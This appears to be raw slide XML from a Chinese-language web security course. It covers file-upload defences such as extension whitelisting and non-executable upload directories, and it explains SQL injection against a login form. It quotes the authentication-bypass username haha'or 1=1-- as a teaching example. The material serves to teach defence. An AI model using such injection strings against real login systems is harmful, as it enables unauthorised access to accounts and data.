              <a:rPr dirty="0" spc="20"/>
              <a:t>检查允许上传的文件扩展名白名单，不属于白名单内，不允许上传。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" spc="15"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="15">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="15"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="20"/>
              <a:t>上传文件的目录必须是</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="5">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="20"/>
              <a:t>请求无法直接访问到的。如果需要访问上传目 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="20"/>
              <a:t>录，必须上传到其他（和</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-5">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="5">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>eb</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="20"/>
              <a:t>服务</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="25"/>
              <a:t>器</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="20"/>
              <a:t>不同的）域名下，并设置该目录为不可执行。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>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31671" y="24369"/>
            <a:ext cx="813435"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2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1250" spc="90">
                <a:latin typeface="等线"/>
                <a:cs typeface="等线"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1250" spc="85">
                <a:latin typeface="等线"/>
                <a:cs typeface="等线"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1250" spc="90">
                <a:latin typeface="等线"/>
                <a:cs typeface="等线"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1250" spc="45">
                <a:latin typeface="等线"/>
                <a:cs typeface="等线"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1250" spc="90">
                <a:latin typeface="等线"/>
                <a:cs typeface="等线"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1250" spc="45">
                <a:latin typeface="等线"/>
                <a:cs typeface="等线"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1250" spc="80">
                <a:latin typeface="等线"/>
                <a:cs typeface="等线"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1250" spc="40">
                <a:latin typeface="等线"/>
                <a:cs typeface="等线"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:endParaRPr sz="1250">
              <a:latin typeface="等线"/>
              <a:cs typeface="等线"/>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38979" y="3096610"/>
            <a:ext cx="208279" cy="216535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1250" spc="60">
                <a:latin typeface="等线"/>
                <a:cs typeface="等线"/>
              </a:rPr>
              <a:t>12</a:t>
            </a:r>
            <a:endParaRPr sz="1250">
              <a:latin typeface="等线"/>
              <a:cs typeface="等线"/>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1262767" y="1373417"/>
            <a:ext cx="3376929" cy="1231900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="21590" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" marR="37465"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当输入正确的用户名</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>和密码</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>123456</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>后，程序会构建一个包含</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>QL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句的字符 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>串</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>代码如下：</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="■"/>
            </a:pPr>
            <a:endParaRPr sz="900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="585"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>最终提交给数据库服务器运行的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句如下：</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="■"/>
            </a:pPr>
            <a:endParaRPr sz="900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="655"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>如果存在此用户并且密码正确，数据库将返回记录数</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>≥</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，则用户认证通过，登录 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>成功。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="17145" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="819"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="420"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>如果使用一个如下所示的比较特殊的用户账号信息来登录，在输入用户名和密码 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>后单击“登录”按钮，也可以正常登录</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2158631" y="1529334"/>
            <a:ext cx="2613660" cy="303275"/>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1779917" y="1924050"/>
            <a:ext cx="2955036" cy="153924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1410347" y="2651759"/>
            <a:ext cx="3324605" cy="585977"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3046361" y="2654045"/>
            <a:ext cx="1687195" cy="579120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1687195" h="579119">
                <a:moveTo>
                  <a:pt x="0" y="579119"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1687068" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1687068" y="579119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="579119"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>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4342765">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" spc="60"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="85"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="45"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="45"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="80"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="40"/>
              <a:t>7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45606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201561" y="901446"/>
            <a:ext cx="172720" cy="2466340"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="172720"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5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414921" y="902208"/>
            <a:ext cx="0" cy="2465070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="0" h="2465070">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="2465070"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="82296">
            <a:solidFill>
              <a:srgbClr val="191B0E"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3897248" y="92659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1049656" y="1961948"/>
            <a:ext cx="1708785" cy="120014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="1905" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>提交给数据库服务器运行的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>QL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句如</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>下</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715397" y="1373417"/>
            <a:ext cx="3387090" cy="1334770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="21590" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="170"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>但是，数据库中只有</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>用户，根本没有</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>haha'or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-70">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1=1--</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>用户，那为什么这个非法用 户可以登录成功</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>呢</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>？</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="380"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>当输入特殊用户名</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>haha'or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1=1--</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>时，最终构成的命令如</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>下</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="■"/>
            </a:pPr>
            <a:endParaRPr sz="900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="605"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
